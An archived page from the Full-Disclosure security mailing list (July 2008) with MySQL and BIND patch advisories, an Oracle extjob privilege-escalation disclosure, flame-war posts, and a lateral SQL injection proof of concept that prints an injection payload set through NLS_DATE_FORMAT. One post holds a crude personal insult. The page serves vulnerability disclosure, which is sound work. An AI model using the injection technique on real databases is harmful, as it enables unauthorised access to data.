headers
security | 20 Jul 01:04
Favicon

[ MDVSA-2008:150 ] - Updated mysql packages fix vulnerabilities


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:150
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mysql
 Date    : July 19, 2008
 Affected: 2007.1, 2008.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Multiple buffer overflows in yaSSL, which is used in MySQL, allowed
 remote attackers to execute arbitrary code (CVE-2008-0226) or cause
 a denial of service via a special Hello packet (CVE-2008-0227).

 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement; as
 well it would not, under certain conditions, prevent two databases
 from using the same paths for data or index files.  This could allow
 an authenticated user with appropriate privilege to create tables in
 one database to read and manipulate data in tables later created in
 other databases, regardless of GRANT privileges (CVE-2008-2079).

 The updated packages have been patched to correct these issues.
(Continue reading)

Permalink | Reply | 0 comments |
headers
n3td3v | 19 Jul 22:40
Picon

Re: Torvalds attacks IT industry 'security circus'

On Sat, Jul 19, 2008 at 7:34 PM, php0t <php0t <at> zorro.hu> wrote:
>
> If I didn't feel you were moving towards being-serious-about-it, i'd give
> you a cookie for writing up so many useless, senseless, and obviously
> provocative thoughts about a subject where you lack even the slightest
> competence.
>
> P.
>

Blame Torvalds and Cnet News if you want to talk about provocative,
they are the ones that made me do the rant, if it wasn't for them I
would have no fuel for my rant im passionate about. So if you want to
know who is provocative its Torvalds and Cnet News.

Ever since Robert Lemos published a story about me i've been against
media outlets talking about mailing list comments, its wrong. Nobody
wants their mailing list comments quoted in the media and I wish
Securityfocus and Cnet News would stop it.

A few drunken rants of mine were taken and put into a PDF file and
written in a Securityfocus news article by Robert Lemos, and you know
the government or whoever might of thought it was true because it was
written by people who thought they knew what they were talking about.

The truth is, three people was n3td3v? No it was probably just me in
three states of sober, drunk and hungover if the Neal Krawetz thing is
anything to be taken seriously.

And the n3td3v is a hacker group who targets Yahoo, Microsoft and
(Continue reading)

Permalink | Reply | 0 comments |
headers
security | 19 Jul 21:39
Favicon

[ MDVSA-2008:149 ] - Updated mysql packages fix vulnerabilities


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:149
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mysql
 Date    : July 19, 2008
 Affected: 2008.1
 _______________________________________________________________________

 Problem Description:

 Sergei Golubchik found that MySQL did not properly validate optional
 data or index directory paths given in a CREATE TABLE statement; as
 well it would not, under certain conditions, prevent two databases
 from using the same paths for data or index files.  This could allow
 an authenticated user with appropriate privilege to create tables in
 one database to read and manipulate data in tables later created in
 other databases, regardless of GRANT privileges (CVE-2008-2079).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
(Continue reading)

Permalink | Reply | 0 comments |
headers
n3td3v | 19 Jul 20:27
Picon

Torvalds attacks IT industry 'security circus'

The maker of Linux was right,

"In an e-mail to the Linux kernel developer mailing list, Torvalds
said a section of the security industry was dedicated to finding bugs
in software only to publicize their findings and gain notoriety."

http://news.cnet.com/Torvalds-attacks-IT-industry-security-circus/2100-1007_3-6243900.html

We've got to stop doing an HD Moore to make a name for ourselves and
release vulnerabilities for the right reason, not to become a cyber
security rock star!!!

The security industry is a circus, its a joke what its turned into,
its not about security anymore its a media circus, with over hype and
over drive.

Let's cut away with the elitism and become normal people again who
aren't pumped up on steroids everyday to become famous.

The media are to blame, the Robert Lemos's and the others, they write
shit all the time just to make their companies ad click money, they
don't really care what's written as long as its security related they
don't care.

As little research as possible and the most amount of over steer to
make the security industry sound more important and exciting than it
is.

Security, its a dull field to be in, once you know it all you really
do know it all. Its a boring sport being a security professional.
(Continue reading)

Permalink | Reply | 0 comments |
headers
rPath Update Announcements | 19 Jul 16:28
Favicon

rPSA-2008-0231-1 bind bind-utils

rPath Security Advisory: 2008-0231-1
Published: 2008-07-19
Products:
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Weakness
Updated Versions:
    bind=conary.rpath.com <at> rpl:2/9.4.2_P1-2-0.1
    bind-utils=conary.rpath.com <at> rpl:2/9.4.2_P1-2-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2378
    https://issues.rpath.com/browse/RPL-2563
    https://issues.rpath.com/browse/RPL-2657

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

Description:
    Previous versions of the bind package are vulnerable to a
    cache-poisoning attack due to a weakness in the DNS protocol.
    This update improves bind's resilience to this attack; however,
    it does not provide a definitive solution.

    Additionally, the bind package has been updated with root
    nameserver information, including the new IP address for 
    the "L" root nameserver.
(Continue reading)

Permalink | Reply | 0 comments |
headers
Joxean Koret | 19 Jul 17:06
Picon
Picon

Oracle Database Local Untrusted Library Path Vulnerability

Oracle Database Local Untrusted Library Path Vulnerability
----------------------------------------------------------

The Oracle July 2008 Critical Patch Update fixes a vulnerability which
allows a user in the OINSTALL/DBA group to scalate privileges to root.

Scalating Privileges from "oracle" to "root"
--------------------------------------------

In Oracle 10g R2 and later (Oracle11g is also vulnerable) the affected
binary, $ORACLE_HOME/bin/extjob, is SUID root and must be suid root. In
the following forum from Oracle you will found a note at the bottom of
the page:

(...)
 In 10.2.0.2 and higher

 rdbms/admin/externaljob.ora file must must be owned by root:oraclegroup
and
 be writable only by the owner i.e. 644 (rw-r--r--)

 bin/extjob file must be also owned by root:oraclegroup but must be
 setuid i.e. 4750 (-rwsr-x---)

 bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
by
 oracle:oraclegroup

 In 11g and higher
(Continue reading)

Permalink | Reply | 0 comments |
headers
Kingcope Kingcope | 18 Jul 19:55

AFK from full-disclosure

I am reachable
0nly <at> two addresses from now on:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
n3td3v | 19 Jul 03:56
Picon

Fwd: Stop The 70% Lie

---------- Forwarded message ----------
From: n3td3v <xploitable <at> gmail.com>
Date: Sat, Jul 19, 2008 at 12:13 AM
Subject: Re: Stop The 70% Lie
To: The Security Community <thesecuritycommunity <at> gmail.com>

On Sat, Jul 19, 2008 at 12:08 AM, The Security Community
<thesecuritycommunity <at> gmail.com> wrote:
> WTF is Gadi's problem, anyway?
>

He's fat and no chicks will fuck him. lol.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
Kingcope Kingcope | 18 Jul 19:12

AFK from fool-disclosure

I am reachable
0nly <at> two addresses:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v


Signed,
KingCope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 1 comment |
headers
rPath Update Announcements | 18 Jul 21:54
Favicon

rPSA-2008-0230-1 bind bind-utils

rPath Security Advisory: 2008-0230-1
Published: 2008-07-18
Products:
    rPath Linux 1

Rating: Major
Exposure Level Classification:
    Remote System User Deterministic Weakness
Updated Versions:
    bind=conary.rpath.com <at> rpl:1/9.3.4_P1-0.5-1
    bind-utils=conary.rpath.com <at> rpl:1/9.3.4_P1-0.5-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2657

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

Description:
    Previous versions of the bind package are vulnerable to a
    cache-poisoning attack due to a weakness in the DNS protocol.
    This update improves bind's resilience to this attack; however,
    it does not provide a definitive solution.

http://wiki.rpath.com/Advisories:rPSA-2008-0230

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
David Litchfield | 18 Jul 16:00
Favicon

Lateral SQL Injection Revisited - No Special Privs Required

At the end of April 2008 I published a paper about a new class of flaw in
Oracle entitled "Lateral SQL Injection". 

The paper can be found here:
http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

Essentially the paper details a way in which the attacker can manipulate the
environment to trick an Oracle database into using arbitrary SQL in DATE
functions and data. 

A number of people at the time dismissed it as irrelevant because the
attacker required the ALTER SESSIOn privilege. Well, as it turns out, you
don't need the ALTER SESSION privilege at all. Here's why: there are certain
ALTER SESSION statements that can be executed even though the user doesn't
have the ALTER SESSION privilege. The statements that can be executed
without the privilege include those that relate to National Language
Support. Thus a user without ALTER SESSION privileges can change the date
format and so employ a lateral SQL injection attack. The script below shows
this in action. We connect to a fully patched 11g server and confirm we only
have CREATE SESSION privileges - i.e. the minimum we need to connect to the
server - everyone gets this privilege. We then issue an ALTER SESSION
statement to try set SQL_TRACE to true. As expected this fails with an
insufficient privileges error. But then we issues an ALTER SESSION to set
the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function
to confirm it took.

C:\>sqlplus /nolog

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008

Copyright (c) 1982, 2007, Oracle.  All rights reserved.

SQL> connect testuser1/testuser1
Connected.
SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION

SQL> alter session set sql_trace = true;
alter session set sql_trace = true
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> alter session set nls_date_format='"'' and myfunc()=1--"';

Session altered.

SQL> select sysdate from dual;

SYSDATE
------------------
' and myfunc()=1--

SQL>

Thus we can see that no special privileges are required to effect a lateral
SQL injection attack. I suppose I should have spotted this at the time.
Cheers,
David

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |

Gmane